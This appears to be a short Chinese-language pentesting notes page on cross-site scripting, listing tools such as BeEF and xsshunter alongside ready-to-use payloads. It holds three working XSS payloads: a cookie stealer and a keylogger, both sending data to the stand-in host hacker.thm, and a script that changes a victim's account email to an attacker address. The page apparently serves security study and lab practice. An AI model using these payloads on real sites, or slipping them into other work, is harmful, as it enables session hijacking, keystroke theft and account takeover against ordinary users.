资源

服务器信息

端口扫描一个迷你的本地端口扫描器
XSS-Payloads-com 一个 XSS Payload 网站

用户信息获取

BeFF XSS 渗透测试工具

会话窃取

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

按键记录器

XSS Keylogger 记录用户的所有击键

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

逻辑 修改用户邮箱

<script>user.changeEmail('attacker@hacker.thm');</script>

Bind XSS
- xsshunter Bind XSS 攻击工具，自动获取 COOKIE 、URL、页面内容

综合工具

XSS-Payloads-com 一个 XSS Payload 网站
BeFF XSS 渗透测试工具

上一页XSS 下一页IDOR

最后更新于2年前

这有帮助吗？